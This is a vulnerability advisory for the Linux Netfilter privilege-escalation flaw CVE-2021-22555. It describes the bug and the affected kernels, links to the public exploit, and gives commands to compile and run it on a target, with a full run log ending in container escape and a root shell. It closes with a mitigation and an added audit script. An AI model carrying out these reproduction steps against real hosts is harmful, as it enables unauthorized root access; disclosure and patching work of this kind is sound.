CVE-2021-22555 Linux Netfilter Privilege Escalation Vulnerability
Vulnerability Description
Recently, a POC and EXP for the Linux Netfilter privilege escalation vulnerability were published on the internet; the associated identifier is CVE-2021-22555. The vulnerability was used in kCTF to attack Kubernetes pod containers and escape from them, and it had been present in the Linux kernel code for 15 years. Netfilter is a subsystem introduced in Linux 2.4.x. As a generic, abstract framework it provides a complete management mechanism for hook functions, which makes packet filtering, network address translation (NAT) and protocol-based connection tracking possible. The Linux Netfilter module contains a heap out-of-bounds write in its implementation of the IPT_SO_SET_REPLACE (or IP6T_SO_SET_REPLACE) setsockopt, and a local attacker can use it to escalate privileges.
Vulnerability Impact
An attacker can exploit this vulnerability for local privilege escalation and container escape.
Affected Versions
The vulnerability affects all Linux kernel versions from 2006 (release of Linux kernel v2.6.19-rc1) up to the present (Linux kernel v5.12-rc8) and can lead to local privilege escalation and container escape.
Vulnerability Reproduction
EXP download address: https://github.com/google/security-research/tree/master/pocs/linux/cve-2021-22555
Upload the EXP to the target machine and run the following commands to compile it and escalate privileges:
gcc -m32 -static -o exploit exploit.c
./exploit
theflow@theflow:~$ gcc -m32 -static -o exploit exploit.c
theflow@theflow:~$ ./exploit
[+] Linux Privilege Escalation by theflow@ - 2021
[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...
[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: ffc
[+] real_idx: fc4
[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff91a49cb7f000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff91a49c7a0000
[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffa1e78380
[+] kbase_addr: ffffffffa0e00000
[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.
[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...
root@theflow:/# id
uid=0(root) gid=0(root) groups=0(root)
root@theflow:/#
Vulnerability Fix
1. Remediation recommendation
Affected users are advised to upgrade the Linux kernel to a patched version promptly.
2. Temporary mitigation:
Following Red Hat's recommendation, users can mitigate the impact of this vulnerability by preventing unprivileged users from using CLONE_NEWUSER and CLONE_NEWNET with the following command:
echo 0 > /proc/sys/user/max_user_namespaces
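The following audit helper is an added example, not part of the advisory or of the exploit repository. It checks whether the user-namespace mitigation above is active, flags kernel release strings that fall inside the version range the advisory lists, and writes a sysctl.d drop-in so the setting survives a reboot; the file and directory paths are parameters (assumed defaults shown) so the functions can be exercised against constructed files.

```shell
#!/bin/sh
# Added audit helper for the CVE-2021-22555 mitigation (not from the advisory).

# Returns 0 when unprivileged user-namespace creation is disabled
# (max_user_namespaces == 0), 1 when it is still allowed, 2 if unreadable.
# $1: sysctl file to inspect (defaults to the live /proc entry).
userns_mitigated() {
    path="${1:-/proc/sys/user/max_user_namespaces}"
    [ -r "$path" ] || return 2
    value=$(tr -d '[:space:]' < "$path")
    case "$value" in
        0) return 0 ;;
        ''|*[!0-9]*) return 2 ;;
        *) return 1 ;;
    esac
}

# Returns 0 if a kernel release string (e.g. "5.4.0-77-generic") falls in
# the range the advisory lists: 2.6.19 up to, but not including, 5.12.
# 5.12 release candidates are not distinguished from the 5.12 release, and
# distributions backport fixes, so a hit only marks a host for follow-up.
kernel_in_advisory_range() {
    case "$1" in *.*) ;; *) return 2 ;; esac
    major=${1%%.*}; rest=${1#*.}
    minor=${rest%%[!0-9]*}
    case "$rest" in
        *.*) rest=${rest#*.}; patch=${rest%%[!0-9]*} ;;
        *) patch=0 ;;
    esac
    case "$major$minor$patch" in ''|*[!0-9]*) return 2 ;; esac
    [ "$major" -lt 2 ] && return 1
    [ "$major" -eq 2 ] && [ "$minor" -lt 6 ] && return 1
    [ "$major" -eq 2 ] && [ "$minor" -eq 6 ] && [ "$patch" -lt 19 ] && return 1
    [ "$major" -gt 5 ] && return 1
    [ "$major" -eq 5 ] && [ "$minor" -ge 12 ] && return 1
    return 0
}

# Writes a persistent sysctl drop-in for the mitigation. Note that this also
# blocks legitimate unprivileged user-namespace use (rootless containers etc.).
# $1: sysctl.d directory (defaults to /etc/sysctl.d, which needs root).
write_mitigation_dropin() {
    dir="${1:-/etc/sysctl.d}"
    printf 'user.max_user_namespaces = 0\n' > "$dir/99-cve-2021-22555.conf"
}
```

Run `userns_mitigated` on the live host to confirm the echo above took effect, and `sysctl --system` after writing the drop-in.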